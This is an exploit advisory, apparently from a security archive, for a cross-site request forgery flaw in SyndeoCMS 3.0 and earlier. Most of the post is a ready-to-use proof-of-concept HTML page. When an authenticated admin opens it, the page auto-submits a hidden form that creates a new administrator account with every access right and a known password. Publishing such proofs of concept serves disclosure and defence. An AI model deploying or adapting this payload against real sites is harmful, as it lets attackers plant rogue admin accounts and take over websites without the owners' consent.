SyndeoCMS 3.0 Cross Site Request Forgery

2012.02.21
Credit: Ivano Binetti
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

+--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : SyndeoCMS <= 3.0 CSRF Vulnerability # Date : 19-02-2012 # Author : Ivano Binetti (http://ivanobinetti.com) # Vendor site : http://www.syndeocms.org/ # Software link : http://sourceforge.net/projects/syndeocms # Version : 3.0 and lower # Tested on : Debian Squeeze (6.0) +--------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------[Add Admin Account by Ivano Binetti]--------------------------------------------------+ Summary 1)Introduction 2)Description 3)Exploit +---------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction The aim of this brief document is to describe a new CSRF vulnerability found into SyndeoCMS 3.0 and lower version and related exploit. 2)Description This kind of vulnerability allows an attacker to add an administrator account into SyndeoCMS 3.0 (and lower) when an authenticated admin browses a web page containing the following html/javascript code. 3)Exploit <html> <body onload="javascript:document.forms[0].submit()"> <H2>I'm adding ADMIN account</H2> <form method="POST" name="form0" action="http://127.0.0.1:80/syndeocms/starnet/index.php?option=configuration&suboption=users&modoption=save_user&user_id="> <input type="hidden" name="fullname" value="new_admin"/> <input type="hidden" name="username" value="new_admin"/> <input type="hidden" name="password" value="password"/> <input type="hidden" name="email" value="admin@admin.com"/> <input type="hidden" name="editor" value="2"/> <input type="hidden" name="sections" value=""/> <input type="hidden" name="access_1" value="1"/> <input type="hidden" name="access_2" value="1"/> <input type="hidden" name="access_13" value="1"/> <input type="hidden" name="access_3" value="1"/> <input type="hidden" name="access_4" value="1"/> <input type="hidden" name="access_5" value="1"/> <input type="hidden" name="access_6" value="1"/> <input type="hidden" name="access_7" value="1"/> <input type="hidden" name="access_8" value="1"/> <input type="hidden" name="access_9" value="1"/> <input type="hidden" name="access_16" value="1"/> <input type="hidden" name="access_10" value="1"/> <input type="hidden" name="access_11" value="1"/> <input type="hidden" name="access_12" value="1"/> <input type="hidden" name="access_14" value="1"/> <input type="hidden" name="access_15" value="1"/> <input type="hidden" name="m_access%5B6%5D" value="1"/> <input type="hidden" name="m_access%5B8%5D" value="1"/> <input type="hidden" name="m_access%5B10%5D" value="1"/> <input type="hidden" name="m_access%5B11%5D" value="1"/> <input type="hidden" name="m_access%5B0%5D" value="1"/> <input type="hidden" name="m_access%5B1%5D" value="1"/> <input type="hidden" name="m_access%5B13%5D" value="1"/> <input type="hidden" name="m_access%5B12%5D" value="1"/> <input type="hidden" name="m_access%5B14%5D" value="1"/> <input type="hidden" name="m_access%5B15%5D" value="1"/> <input type="hidden" name="m_access%5B7%5D" value="1"/> <input type="hidden" name="m_access%5B19%5D" value="1"/> <input type="hidden" name="m_access%5B2%5D" value="1"/> <input type="hidden" name="m_access%5B16%5D" value="1"/> <input type="hidden" name="m_access%5B17%5D" value="1"/> <input type="hidden" name="m_access%5B18%5D" value="1"/> <input type="hidden" name="m_access%5B3%5D" value="1"/> <input type="hidden" name="m_access%5B4%5D" value="1"/> <input type="hidden" name="m_access%5B9%5D" value="1"/> <input type="hidden" name="m_access%5B5%5D" value="1"/> </form> </body> +----------------------------------------------------------------------------------------------------------------------------------+

References:

http://ivanobinetti.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top